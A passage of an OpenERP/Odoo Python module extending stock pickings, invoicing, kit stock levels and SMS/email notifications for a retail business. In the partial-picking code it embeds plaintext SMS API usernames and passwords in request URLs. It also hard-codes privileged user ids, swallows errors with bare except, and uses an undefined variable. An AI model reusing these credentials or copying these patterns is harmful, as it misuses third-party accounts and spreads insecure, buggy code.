'stock_real_value': fields.function(_product_value, type='float', string='Real Stock Value', multi=\"stock\", digits_compute=dp.get_precision('Account')),\n 'stock_virtual_value': fields.function(_product_value, type='float', string='Virtual Stock Value', multi=\"stock\", digits_compute=dp.get_precision('Account')),\n }\n\nclass stock_picking(orm.Model):\n _inherit = 'stock.picking'\n\n def _crm_claim(self, cr, uid, ids, field_names, arg, context=None):\n res = {}\n for picking in self.browse(cr, uid, ids, context=context):\n res[picking.id] = {\n 'if_claim':False,\n 'claim_id':False,\n }\n if picking.sale_id:\n claim_id = self.pool.get('crm.claim').search(cr, uid, [('sale_id','=',picking.sale_id.id)])\n if claim_id and claim_id[0]:\n res[picking.id] = {\n 'if_claim':True,\n 'claim_id':claim_id[0],\n }\n return res\n\n _columns = {\n #'if_notification': fields.boolean('Email DO Notification', help=\"Send DO Notification Auto\"),\n #'auto_email': fields.many2one('auto.email.int', \"Auto Email Template\"),\n 'auto_email': fields.many2one('auto.email.do', \"Auto Email Template\"),\n 'shipping_method':fields.related('sale_id','shipping_method',type='selection',selection=[\n ('collection','Collection'), \n ('post','Post'), \n ('courier','Courier'), \n ('free','Free Shipping'), \n ('transport','Own Transport'),\n ('freight','Freight')\n ],readonly='1',string='Shipping Method'),\n 'is_preorder':fields.related('sale_id','is_preorder',type='boolean',readonly='1',string='If prepay order'),\n 'control' : fields.char('3PL Inward Control #', size=32, select=True),\n 'date_order': fields.related('purchase_id','date_order',string='ETD',readonly=True,type=\"date\"),\n 'minimum_planned_date': fields.related('purchase_id','minimum_planned_date',string='Expected Date',readonly=True,type=\"date\"),\n 'partner_ref': fields.related('purchase_id','partner_ref',string='Supplier Reference',readonly=True,type=\"char\"),\n #Issue350\n 'is_seconds': fields.boolean('Is Seconds'),\n 'seconds': fields.selection((\n ('missing','Missing Parts'), \n ('fully','Fully Damaged')),'Seconds'),\n 'seconds_lines': fields.one2many('seconds.line', 'picking_id', string='Seconds Lines'),\n 'if_claim': fields.function(_crm_claim, type='boolean', string='If Claim', multi='claim'),\n 'claim_id': fields.function(_crm_claim, type='many2one', relation='crm.claim', string='Claim ID', multi='claim'), #Issue349\n }\n\n _defaults = {\n #'if_notification': True,\n }\n\n #Issue267\n def create(self, cr, uid, vals, context=None):\n auto_email = self.pool.get('auto.email.do').search(cr, uid, \n [('company_id', '=', self.pool.get('res.users').browse(cr, uid, uid).company_id.id)],\n limit=1)\n if auto_email:\n vals.update({'auto_email': auto_email[0]})\n return super(stock_picking, self).create(cr, uid, vals, context=context)\n\n def write(self, cr, uid, ids, vals, context=None):\n if isinstance(ids, (int, long)):\n ids = [ids]\n if ((context and not context.get('from stock')) or not context):\n for picking in self.browse(cr, uid, ids):\n if 'note' in vals:\n self.pool.get('sale.order').write(cr, uid, picking.sale_id.id, {'note':vals['note']}, context={'from stock':True})\n for p in picking.sale_id.picking_ids:\n self.write(cr, uid, p.id, {'note':vals['note']}, context={'from stock':True})\n #Issue266\n if 'carrier_id' in vals:\n if picking.sale_id:\n for picking_id in picking.sale_id.picking_ids:\n if picking_id.type == 'out' and (not picking_id.carrier_id or picking_id.carrier_id == picking.carrier_id):\n self.write(cr, uid, picking_id.id, {'carrier_id':vals['carrier_id']}, context={'from stock':True})\n if 'carrier_tracking_ref' in vals:\n if picking.sale_id:\n for picking_id in picking.sale_id.picking_ids:\n if picking_id.type == 'out' and (not picking_id.carrier_tracking_ref or picking_id.carrier_tracking_ref == picking.carrier_tracking_ref):\n self.write(cr, uid, picking_id.id, {'carrier_tracking_ref':vals['carrier_tracking_ref']}, context={'from stock':True})\n return super(stock_picking, self).write(cr, uid, ids, vals, context=context)\n\n\n def action_view_so(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'sale', 'action_orders')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #sale order\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n res = mod_obj.get_object_reference(cr, uid, 'sale', 'view_order_form')\n result['views'] = [(res and res[1] or False, 'form')]\n result['res_id'] = picking.sale_id.id\n return result\n\n def action_view_do(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_picking_tree')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #sale order\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n for picking_id in picking.sale_id.picking_ids:\n if picking_id.type == 'out':\n res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_out_form')\n result['views'] = [(res and res[1] or False, 'form')]\n result['res_id'] = picking_id.id\n return result\n return True\n\n\n def action_done(self, cr, uid, ids, context=None):\n for picking in self.browse(cr, uid, ids, context=context):\n #issue119\n if picking.type == 'in' and picking.company_id.id in (4,5,7) and picking.purchase_id and picking.purchase_id.related_so:\n so = self.pool.get('sale.order').browse(cr, 86, int(picking.purchase_id.related_so))\n #if not so.invoiced:\n # raise osv.except_osv('Invalid Action!', 'The %s has not been paid! Please check it!'%so.name)\n for p in so.picking_ids:\n if p.type == 'internal' and p.state != 'done':\n raise osv.except_osv('Invalid Action!', 'The INT %s has not been delivered! Please check it!'%p.name)\n if p.type == 'out':\n wf_service = netsvc.LocalService('workflow')\n #self.action_confirm_zx(cr, 86, p.id, context=context)\n res = wf_service.trg_validate(86, 'stock.picking', p.id, 'button_confirm', cr)\n res = wf_service.trg_validate(86, 'stock.picking', p.id, 'button_done', cr)\n if picking.type == 'internal' and picking.company_id.id == 8 and picking.sale_id and picking.sale_id.related_po:\n po = self.pool.get('purchase.order').browse(cr, 1, int(picking.sale_id.related_po))\n if po.company_id.id == 5:\n self.pool.get('res.users').write(cr, 1, 48, {'company_id':5}, context=context)\n \n #send purchase@mactrends.com\n ir_model_data = self.pool.get('ir.model.data')\n try:\n template_id = ir_model_data.get_object_reference(cr, 48, 'purchase_enhance','email_template_purchase_confirm')[1]\n except ValueError:\n template_id = False\n if template_id:\n template_obj = self.pool.get('email.template')\n template_obj.write(cr, 1, [template_id], {'email_to':'purchase@mactrends.com'})\n mail_id = template_obj.send_mail(cr, 48, template_id, po.id, True)\n\n result = super(stock_picking, self).action_done(cr, uid, ids, context=context)\n for picking in self.browse(cr, uid, ids, context=context):\n #issue150\n if picking.type == 'out' and picking.sale_id:\n wf_service = netsvc.LocalService('workflow')\n wf_service.trg_validate(uid, 'sale.order', picking.sale_id.id, 'button_done', cr)\n #Issue261\n if picking and picking.partner_id and picking.partner_id.email and picking.state in ('progress','manual'):\n tmp_ids = []\n for line in picking.move_lines:\n if line.product_id.auto_email and line.product_id.auto_email.is_send_do:\n for template_id in line.product_id.auto_email.templates_do:\n tmp_ids.append(template_id.id)\n elif line.product_id.categ_id.auto_email and line.product_id.categ_id.auto_email.is_send_do:\n for template_id in line.product_id.categ_id.auto_email.templates_do:\n tmp_ids.append(template_id.id)\n for tmp_id in list(set(tmp_ids)): \n template_obj.send_mail(cr, uid, tmp_id, picking.id, True)\n return result\n\n def action_confirm_zx(self, cr, uid, ids, context=None):\n \"\"\" Confirm the inventory and writes its finished date\n @return: True\n \"\"\"\n if context is None:\n context = {}\n # to perform the correct inventory corrections we need analyze stock location by\n # location, never recursively, so we use a special context\n product_context = dict(context, compute_child=False)\n\n location_obj = self.pool.get('stock.location')\n for inv in self.browse(cr, uid, ids, context=context):\n move_ids = []\n for line in inv.inventory_line_id:\n pid = line.product_id.id\n product_context.update(uom=line.product_uom.id, to_date=inv.date, date=inv.date, prodlot_id=line.prod_lot_id.id)\n amount = location_obj._product_get(cr, uid, line.location_id.id, [pid], product_context)[pid]\n change = line.product_qty - amount\n lot_id = line.prod_lot_id.id\n if change:\n location_id = line.product_id.property_stock_inventory.id\n value = {\n 'name': _('INV:') + (line.inventory_id.name or ''),\n 'product_id': line.product_id.id,\n 'product_uom': line.product_uom.id,\n 'prodlot_id': lot_id,\n 'date': inv.date,\n }\n\n if change > 0:\n value.update( {\n 'product_qty': change,\n 'location_id': location_id,\n 'location_dest_id': line.location_id.id,\n })\n else:\n value.update( {\n 'product_qty': -change,\n 'location_id': line.location_id.id,\n 'location_dest_id': location_id,\n })\n move_ids.append(self._inventory_line_hook(cr, uid, line, value))\n self.write(cr, uid, [inv.id], {'state': 'confirm', 'move_ids': [(6, 0, move_ids)]})\n self.pool.get('stock.move').action_confirm(cr, uid, move_ids, context=context)\n return True\n\n def action_check(self, cr, uid, ids, *args):\n \"\"\" Check qty of product.\n if f == 'qty_available':\n c.update({ 'states': ('done',), 'what': ('in', 'out') })\n if f == 'virtual_available':\n c.update({ 'states': ('confirmed','waiting','assigned','done'), 'what': ('in', 'out') })\n if f == 'incoming_qty':\n c.update({ 'states': ('confirmed','waiting','assigned'), 'what': ('in',) })\n if f == 'outgoing_qty':\n c.update({ 'states': ('confirmed','waiting','assigned'), 'what': ('out',) })\n @return: True\n \"\"\"\n for picking in self.browse(cr, uid, ids):\n for move in picking.move_lines:\n qty = self.pool.get('stock.location')._product_get_multi_location(cr, uid, [move.location_id.id], product_ids=[move.product_id.id], context={\n 'states': ['done'],\n 'what': ('in', 'out'),\n 'location': [move.location_id.id]\n })\n if qty.get(move.product_id.id, 0) - move.product_qty < 0:\n raise osv.except_osv('Invalid Action!', 'The qty of %s is not enough(%s<%s)! Please check it!'%(move.product_id.name_template, qty.get(move.product_id.id, 0), move.product_qty))\n return self.action_assign(cr, uid, ids, *args)\n\n #Issue363\n def _prepare_invoice(self, cr, uid, picking, partner, inv_type, journal_id, context=None):\n invoice_vals = super(stock_picking, self)._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)\n if 'return' in picking.name:\n invoice_vals.update({\n 'product_return': True,\n 'refund_picking_id': picking.id,\n #'if_returned': picking.state == 'done' and True or False\n })\n if picking.claim_id:\n invoice_vals.update({\n 'claim_id': picking.claim_id.id\n })\n return invoice_vals\n\n #Issue349\n def action_invoice_create(self, cr, uid, ids, journal_id=False,\n group=False, type='out_invoice', context=None):\n \"\"\" Creates invoice based on the invoice state selected for picking.\n @param journal_id: Id of journal\n @param group: Whether to create a group invoice or not\n @param type: Type invoice to be created\n @return: Ids of created invoices for the pickings\n \"\"\"\n if context is None:\n context = {}\n\n invoice_obj = self.pool.get('account.invoice')\n invoice_line_obj = self.pool.get('account.invoice.line')\n partner_obj = self.pool.get('res.partner')\n invoices_group = {}\n res = {}\n inv_type = type\n for picking in self.browse(cr, uid, ids, context=context):\n if picking.invoice_state != '2binvoiced':\n continue\n partner = self._get_partner_to_invoice(cr, uid, picking, context=context)\n if isinstance(partner, int):\n partner = partner_obj.browse(cr, uid, [partner], context=context)[0]\n if not partner:\n raise osv.except_osv(_('Error, no partner!'),\n _('Please put a partner on the picking list if you want to generate invoice.'))\n\n if not inv_type:\n inv_type = self._get_invoice_type(picking)\n\n if group and partner.id in invoices_group:\n invoice_id = invoices_group[partner.id]\n invoice = invoice_obj.browse(cr, uid, invoice_id)\n invoice_vals_group = self._prepare_invoice_group(cr, uid, picking, partner, invoice, context=context)\n invoice_obj.write(cr, uid, [invoice_id], invoice_vals_group, context=context)\n else:\n invoice_vals = self._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)\n invoice_id = invoice_obj.create(cr, uid, invoice_vals, context=context)\n invoices_group[partner.id] = invoice_id\n res[picking.id] = invoice_id\n #Issue349\n if not picking.sale_id:\n for move_line in picking.move_lines:\n if move_line.state == 'cancel':\n continue\n if move_line.scrapped:\n # do no invoice scrapped products\n continue\n vals = self._prepare_invoice_line(cr, uid, group, picking, move_line,\n invoice_id, invoice_vals, context=context)\n if vals:\n invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)\n self._invoice_line_hook(cr, uid, move_line, invoice_line_id)\n else:\n for move_line in picking.sale_id.order_line:\n if move_line.state == 'cancel':\n continue\n vals = self._prepare_invoice_line_sale(cr, uid, group, picking, move_line,\n invoice_id, invoice_vals, context=context)\n if vals:\n invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)\n move_line.write({'invoice_lines': [(4, invoice_line_id)]})\n\n\n invoice_obj.button_compute(cr, uid, [invoice_id], context=context,\n set_total=(inv_type in ('in_invoice', 'in_refund')))\n self.write(cr, uid, [picking.id], {\n 'invoice_state': 'invoiced',\n }, context=context)\n self._invoice_hook(cr, uid, picking, invoice_id)\n self.write(cr, uid, res.keys(), {\n 'invoice_state': 'invoiced',\n }, context=context)\n return res\n\n def _prepare_invoice_line_sale(self, cr, uid, group, picking, move_line, invoice_id,\n invoice_vals, context=None):\n \"\"\" Builds the dict containing the values for the invoice line\n @param group: True or False\n @param picking: picking object\n @param: move_line: move_line object\n @param: invoice_id: ID of the related invoice\n @param: invoice_vals: dict used to created the invoice\n @return: dict that will be used to create the invoice line\n \"\"\"\n if group:\n name = (picking.name or '') + '-' + move_line.name\n else:\n name = move_line.name\n origin = move_line.order_id.name or ''\n if move_line.order_id.origin:\n origin += ':' + move_line.order_id.origin\n\n if invoice_vals['type'] in ('out_invoice', 'out_refund'):\n account_id = move_line.product_id.property_account_income.id\n if not account_id:\n account_id = move_line.product_id.categ_id.\\\n property_account_income_categ.id\n else:\n account_id = move_line.product_id.property_account_expense.id\n if not account_id:\n account_id = move_line.product_id.categ_id.\\\n property_account_expense_categ.id\n if invoice_vals['fiscal_position']:\n fp_obj = self.pool.get('account.fiscal.position')\n fiscal_position = fp_obj.browse(cr, uid, invoice_vals['fiscal_position'], context=context)\n account_id = fp_obj.map_account(cr, uid, fiscal_position, account_id)\n # set UoS if it's a sale and the picking doesn't have one\n uos_id = move_line.product_uos and move_line.product_uos.id or False\n if not uos_id and invoice_vals['type'] in ('out_invoice', 'out_refund'):\n uos_id = move_line.product_uom.id\n\n return {\n 'name': name,\n 'origin': origin,\n 'invoice_id': invoice_id,\n 'uos_id': uos_id,\n 'product_id': move_line.product_id.id,\n 'account_id': account_id,\n 'price_unit': self._get_price_unit_invoice_sale(cr, uid, move_line, invoice_vals['type']),\n 'discount': move_line.discount,\n 'quantity': move_line.product_uos_qty or move_line.product_qty,\n 'invoice_line_tax_id': [(6, 0, [x.id for x in move_line.tax_id])],\n 'account_analytic_id': self._get_account_analytic_invoice(cr, uid, picking, move_line),\n }\n\n def _get_price_unit_invoice_sale(self, cursor, user, move_line, type):\n uom_id = move_line.product_id.uom_id.id\n uos_id = move_line.product_id.uos_id and move_line.product_id.uos_id.id or False\n price = move_line.price_unit\n coeff = move_line.product_id.uos_coeff\n if uom_id != uos_id and coeff != 0:\n price_unit = price / coeff\n return price_unit\n return move_line.price_unit\n\n\nclass stock_picking_out(orm.Model):\n _inherit = 'stock.picking.out'\n\n def _crm_claim(self, cr, uid, ids, field_names, arg, context=None):\n res = {}\n for picking in self.browse(cr, uid, ids, context=context):\n res[picking.id] = {\n 'if_claim':False,\n 'claim_id':False,\n }\n if picking.sale_id:\n claim_id = self.pool.get('crm.claim').search(cr, uid, [('sale_id','=',picking.sale_id.id)])\n if claim_id and claim_id[0]:\n res[picking.id] = {\n 'if_claim':True,\n 'claim_id':claim_id[0],\n }\n return res\n\n _columns = {\n #'if_notification': fields.boolean('Email DO Notification', help=\"Send DO Notification Auto\"),\n 'auto_email': fields.many2one('auto.email.do', \"Auto Email Template\"),\n 'shipping_method':fields.related('sale_id','shipping_method',type='selection',selection=[\n ('collection','Collection'), \n ('post','Post'), \n ('courier','Courier'), \n ('free','Free Shipping'), \n ('transport','Own Transport'),\n ('freight','Freight')\n ],readonly='1',string='Shipping Method'),\n 'if_claim': fields.function(_crm_claim, type='boolean', string='If Claim', multi='claim'),\n 'claim_id': fields.function(_crm_claim, type='many2one', relation='crm.claim', string='Claim ID', multi='claim'), #Issue349\n }\n\n _defaults = {\n #'if_notification': True,\n }\n\n #Issue267\n def create(self, cr, uid, vals, context=None):\n auto_email = self.pool.get('auto.email.do').search(cr, uid, \n [('company_id', '=', self.pool.get('res.users').browse(cr, uid, uid).company_id.id)],\n limit=1)\n if auto_email:\n vals.update({'auto_email': auto_email[0]})\n return super(stock_picking_out, self).create(cr, uid, vals, context=context)\n\n def write(self, cr, uid, ids, vals, context=None):\n if isinstance(ids, (int, long)):\n ids = [ids]\n res = super(stock_picking_out, self).write(cr, uid, ids, vals, context=context)\n if 'note' in vals and ((context and not context.get('from stock')) or not context):\n for picking in self.browse(cr, uid, ids, context=context):\n self.pool.get('sale.order').write(cr, uid, picking.sale_id.id, {'note':vals['note']}, context={'from stock':True})\n for p in picking.sale_id.picking_ids:\n self.pool.get('stock.picking').write(cr, uid, p.id, {'note':vals['note']}, context={'from stock':True})\n return res\n\n def action_view_so(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'sale', 'action_orders')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #sale order\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n res = mod_obj.get_object_reference(cr, uid, 'sale', 'view_order_form')\n result['views'] = [(res and res[1] or False, 'form')]\n result['res_id'] = picking.sale_id.id\n return result\n\n def action_view_int(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_picking_tree')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #sale order\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n for picking_id in picking.sale_id.picking_ids:\n if picking_id.type == 'internal':\n res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_form')\n result['views'] = [(res and res[1] or False, 'form')]\n result['res_id'] = picking_id.id\n return result\n return True\n\n #issue 121\n def action_view_claim(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'crm_claim', 'crm_case_categ_claim0')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #crm claim\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n res = mod_obj.get_object_reference(cr, uid, 'crm_claim', 'crm_case_claims_form_view')\n result['views'] = [(res and res[1] or False, 'form')]\n claim_id = self.pool.get('crm.claim').search(cr, uid, [('sale_id','=',picking.sale_id.id)])\n if claim_id and claim_id[0]:\n result['res_id'] = claim_id[0]\n return result\n\n #issue137\n def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False):\n if not context:\n context = {}\n if uid != 1:\n company_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.id\n domain.append(['company_id','=',company_id])\n return super(stock_picking_out, self).read_group(cr, uid, domain, fields, groupby, offset=offset, limit=limit, context=context, orderby=orderby)\n\n\nclass stock_picking_in(orm.Model):\n _inherit = 'stock.picking.in'\n\n def _crm_claim(self, cr, uid, ids, field_names, arg, context=None):\n res = {}\n for picking in self.browse(cr, uid, ids, context=context):\n res[picking.id] = {\n 'if_claim':False,\n 'claim_id':False,\n }\n if picking.sale_id:\n claim_id = self.pool.get('crm.claim').search(cr, uid, [('sale_id','=',picking.sale_id.id)])\n if claim_id and claim_id[0]:\n res[picking.id] = {\n 'if_claim':True,\n 'claim_id':claim_id[0],\n }\n return res\n\n #Issue242\n _columns = {\n 'date_order': fields.related('purchase_id','date_order',string='ETD',readonly=True,type=\"date\"),\n 'minimum_planned_date': fields.related('purchase_id','minimum_planned_date',string='Expected Date',readonly=True,type=\"date\"),\n 'partner_ref': fields.related('purchase_id','partner_ref',string='Supplier Reference',readonly=True,type=\"char\"),\n #Issue350\n 'is_seconds': fields.boolean('Is Seconds'),\n 'seconds': fields.selection((\n ('missing','Missing Parts'), \n ('fully','Fully Damaged')),'Seconds'),\n 'seconds_lines': fields.one2many('seconds.line', 'picking_id', string='Seconds Lines'),\n #'claim_id': fields.many2one('crm.claim', string='Claim ID'), #Issue349\n 'if_claim': fields.function(_crm_claim, type='boolean', string='If Claim', multi='claim'),\n 'claim_id': fields.function(_crm_claim, type='many2one', relation='crm.claim', string='Claim ID', multi='claim'), #Issue349\n }\n\n# def default_get(self, cr, uid, fields, context=None):\n# if context is None:\n# context = {}\n# res = super(stock_picking_in, self).default_get(cr, uid, fields, context=context)\n#\n# if 'claim_id' in fields and 'claim_id' in context:\n# res.update({'claim_id': context['claim_id']})\n#\n# return res\n #Issue349\n def action_invoice_create(self, cr, uid, ids, journal_id=False,\n group=False, type='out_invoice', context=None):\n \"\"\" Creates invoice based on the invoice state selected for picking.\n @param journal_id: Id of journal\n @param group: Whether to create a group invoice or not\n @param type: Type invoice to be created\n @return: Ids of created invoices for the pickings\n \"\"\"\n if context is None:\n context = {}\n\n invoice_obj = self.pool.get('account.invoice')\n invoice_line_obj = self.pool.get('account.invoice.line')\n partner_obj = self.pool.get('res.partner')\n invoices_group = {}\n res = {}\n inv_type = type\n for picking in self.browse(cr, uid, ids, context=context):\n if picking.invoice_state != '2binvoiced':\n continue\n partner = self._get_partner_to_invoice(cr, uid, picking, context=context)\n if isinstance(partner, int):\n partner = partner_obj.browse(cr, uid, [partner], context=context)[0]\n if not partner:\n raise osv.except_osv(_('Error, no partner!'),\n _('Please put a partner on the picking list if you want to generate invoice.'))\n\n if not inv_type:\n inv_type = self._get_invoice_type(picking)\n\n if group and partner.id in invoices_group:\n invoice_id = invoices_group[partner.id]\n invoice = invoice_obj.browse(cr, uid, invoice_id)\n invoice_vals_group = self._prepare_invoice_group(cr, uid, picking, partner, invoice, context=context)\n invoice_obj.write(cr, uid, [invoice_id], invoice_vals_group, context=context)\n else:\n invoice_vals = self._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)\n invoice_id = invoice_obj.create(cr, uid, invoice_vals, context=context)\n invoices_group[partner.id] = invoice_id\n res[picking.id] = invoice_id\n #Issue349\n if not picking.sale_id:\n for move_line in picking.move_lines:\n if move_line.state == 'cancel':\n continue\n if move_line.scrapped:\n # do no invoice scrapped products\n continue\n vals = self._prepare_invoice_line(cr, uid, group, picking, move_line,\n invoice_id, invoice_vals, context=context)\n if vals:\n invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)\n self._invoice_line_hook(cr, uid, move_line, invoice_line_id)\n else:\n for move_line in picking.sale_id.order_line:\n if move_line.state == 'cancel':\n continue\n vals = self._prepare_invoice_line_sale(cr, uid, group, picking, move_line,\n invoice_id, invoice_vals, context=context)\n if vals:\n invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)\n move_line.write({'invoice_lines': [(4, invoice_line_id)]})\n\n\n invoice_obj.button_compute(cr, uid, [invoice_id], context=context,\n set_total=(inv_type in ('in_invoice', 'in_refund')))\n self.write(cr, uid, [picking.id], {\n 'invoice_state': 'invoiced',\n }, context=context)\n self._invoice_hook(cr, uid, picking, invoice_id)\n self.write(cr, uid, res.keys(), {\n 'invoice_state': 'invoiced',\n }, context=context)\n return res\n\n\nclass stock_partial_picking(osv.osv_memory):\n _inherit = \"stock.partial.picking\"\n\n def do_partial(self, cr, uid, ids, context={}):\n ret_val = super(stock_partial_picking, self).do_partial(cr, uid, ids, context=context)\n ''' \n if context.get('send_au_ftp_file', False):\n picking_obj.send_freight_file(cr, uid, context['active_ids'], context)\n template = self.pool.get('ir.model.data').get_object(cr, uid, 'picking_notify', 'picking_notify_email_template')\n ''' \n picking_obj = self.pool.get('stock.picking.out')\n email_obj = self.pool.get('email.template')\n for picking in picking_obj.browse(cr, uid, context['active_ids']):\n if picking.type=='out' and picking.auto_email and picking.auto_email.if_notify and picking.partner_id and picking.partner_id.email:\n for move in picking.move_lines:\n if move.location_dest_id.id == 9: #客户\n '''\n if picking.company_id.id == 5:\n template_id = 55\n elif picking.company_id.id == 4:\n template_id = 27\n elif picking.company_id.id == 7:\n template_id = 28\n else:\n return ret_val\n '''\n template_id = picking.auto_email.template_notify\n mail_id = email_obj.send_mail(cr, uid, template_id, picking.id, force_send=True)\n #zhangxue send sms\n email = self.pool.get('mail.mail').browse(cr, uid, mail_id)\n if not email:\n return ret_val\n if hasattr(email, 'mail_server_id') and (not email.mail_server_id):\n return ret_val\n try:\n template = template_obj.browse(cr, uid, template_id, context=context)\n if template and template.if_sms and template.sms and template.sms.strip():\n sms_body = template_obj.render_template(cr, uid, template.sms, template.model, ids[0], context)\n partner_id = self.browse(cr, uid, ids[0]).partner_id\n sms_to = partner_id.phone or partner_id.mobile or ''\n sms_to = sms_to.replace(' ','')\n if sms_to and sms_body:\n if picking.company_id.id == 4:\n sms_to = '61' + sms_to[1:]\n elif picking.company_id.id == 5:\n sms_to = '64' + sms_to[1:]\n #url = 'https://www.siptraffic.com/myaccount/sendsms.php?username=mactrends&password=jmfimports2010&from=+001800&to=%s&text=%s'%(sms_to,sms_body)\n url = 'http://api.clickatell.com/http/sendmsg?user=mactrends_sms&password=PNKMUaffcWAIeN&api_id=3536862&to=%s&text=%s'%(sms_to,sms_body)\n res = requests.get(url)\n except:\n pass\n\n break\n return ret_val\n\nclass product_product(osv.osv):\n _inherit = \"product.product\"\n\n def _volume_total(self, cr, uid, ids, field_names, arg, context=None):\n res = {}\n for pd in self.browse(cr, uid, ids, context=context):\n res[pd.id] = pd.qty_available * pd.volume\n return res\n\n def _kits_product_available(self, cr, uid, ids, field_names=None, arg=False, context=None):\n res = {}\n field_names = field_names or []\n context = context or {}\n for id in ids:\n res[id] = {}.fromkeys(field_names, 0.0)\n field_map = {\n 'kits_qty_available': 'qty_available',\n 'kits_incoming_qty': 'incoming_qty',\n 'kits_outgoing_qty': 'outgoing_qty',\n 'kits_virtual_available': 'virtual_available'\n }\n for product_record in self.browse(cr, uid, ids, context=context):\n #check if is a kit product.\n so_qty = self._get_sale_quotation_qty(cr, uid, product_record.id, context=context)\n if not self._is_kit(\n cr, uid,\n [product_record.id],\n context=context).get(product_record.id):\n\n res[product_record.id] = {\n 'kits_qty_available': 0,\n 'kits_incoming_qty': 0,\n 'kits_virtual_available': 0,\n 'kits_outgoing_qty': 0,\n 'kits_sale_quotation_qty': so_qty\n }\n #product with no bom\n # if not product_record.bom_ids:\n # raw_res = self._product_available(cr, uid, [product_record.id], field_map.values(), arg, context)\n # for key, val in field_map.items():\n # res[product_record.id][key] = raw_res[product_record.id].get(val)\n\n #TODO how to deal with multi-bom products.\n #now get always get the first bom.\n #product with bom\n else:\n for bom in product_record.bom_ids:\n #bom type is phantom\n #TODO take care of the valid date of the components\n if bom.type == 'phantom':\n child_product_res = {}\n for line in bom.bom_lines:\n child_product_res[line.product_id.id] = {'product_qty': line.product_qty or 0.0}\n child_product_qtys = self._product_available(cr, uid, child_product_res.keys(), field_map.values(), context=context)\n res[product_record.id] = {\n 'kits_qty_available': self._get_qty_from_children(child_product_qtys, child_product_res, 'qty_available'),\n 'kits_incoming_qty': self._get_qty_from_children(child_product_qtys, child_product_res, 'incoming_qty'),\n 'kits_virtual_available': self._get_qty_from_children(child_product_qtys, child_product_res, 'virtual_available') - so_qty,\n 'kits_outgoing_qty': self._get_qty_from_children(child_product_qtys, child_product_res, 'outgoing_qty'),\n 'kits_sale_quotation_qty': so_qty\n }\n\n else:\n raw_res = self._product_available(cr, uid, ids, field_map.values(), arg, context)\n for key, val in field_map.items():\n res[product_record.id][key] = raw_res[product_record.id].get(val)\n\n #only get the first bom.\n break\n return res\n\n def _get_sale_quotation_qty(self, cr, uid, product_id, context=None):\n '''get all qty of the product in all sale quotations (draft, sent)'''\n sol_obj = self.pool.get('sale.order.line')\n domain = [('state', 'in', ('draft', False, None)), ('product_id', '=', product_id)]\n #TODO take care of the uom.\n sol_ids = sol_obj.read_group(cr, uid, domain, ['product_uom_qty', 'product_id'], groupby=['product_id'])\n return sol_ids and sol_ids[0].get('product_uom_qty') or 0.0\n\n def _get_qty_from_children(self, child_product_qtys, child_product_res, field_name):\n def qty_div(product_total_qty, component_qty):\n return product_total_qty[1].get(field_name) / component_qty[1].get('product_qty')\n # when the bom has no components\n # Alex Duan <alex.duan@elico-corp.com>\n if not child_product_res:\n raise osv.except_osv(\n _('Warning'),\n _('BoM of this product has no components.\\n'\n 'To avoid this warning, you might add components for this BoM.\\n'))\n return min(map(qty_div, child_product_qtys.iteritems(), child_product_res.iteritems()))\n\n _columns = {\n 'default_code' : fields.char('Internal Reference', size=64, select=True, required=True),\n 'volume_total': fields.function(_volume_total, type='float', string='Total Volume', digits_compute=dp.get_precision('Payroll Rate'), help=\"The volume in m3 * qty_onhand\"),\n }\n\n def _check_ref(self, cr, uid, ids, context=None):\n obj = self.browse(cr, uid, ids[0], context=context)\n refs = self.search(cr, uid, [('default_code','=',obj.default_code)], context=context)\n if len(refs)>1:\n raise osv.except_osv('Invalid Action!', 'The product ref %s repeat again! Please check it!'%obj.default_code)\n return True\n\n _constraints = [\n (_check_ref, 'The internal reference must be unique!', ['default_code'])\n ]\n\n _sql_constraints = [\n ('uniq_default_code', 'unique(default_code)', \"The ref must be unique!\"),\n ]\n\n\n def copy(self, cr, uid, id, default=None, context=None):\n if context is None:\n context={}\n if not default:\n default = {}\n default = default.copy()\n code = self.read(cr, uid, id, ['default_code'], context=context)['default_code']\n default.update(default_code=\"%s(copy)\" % (code))\n return super(product_product, self).copy(cr, uid, id, default=default, context=context)\n\nproduct_product()\n\nclass stock_inventory_line(osv.osv):\n _inherit = \"stock.inventory.line\"\n _columns = {\n 'location_id': fields.many2one('stock.location', 'Location', required=True, states={'confirm': [('readonly', True)], 'done': 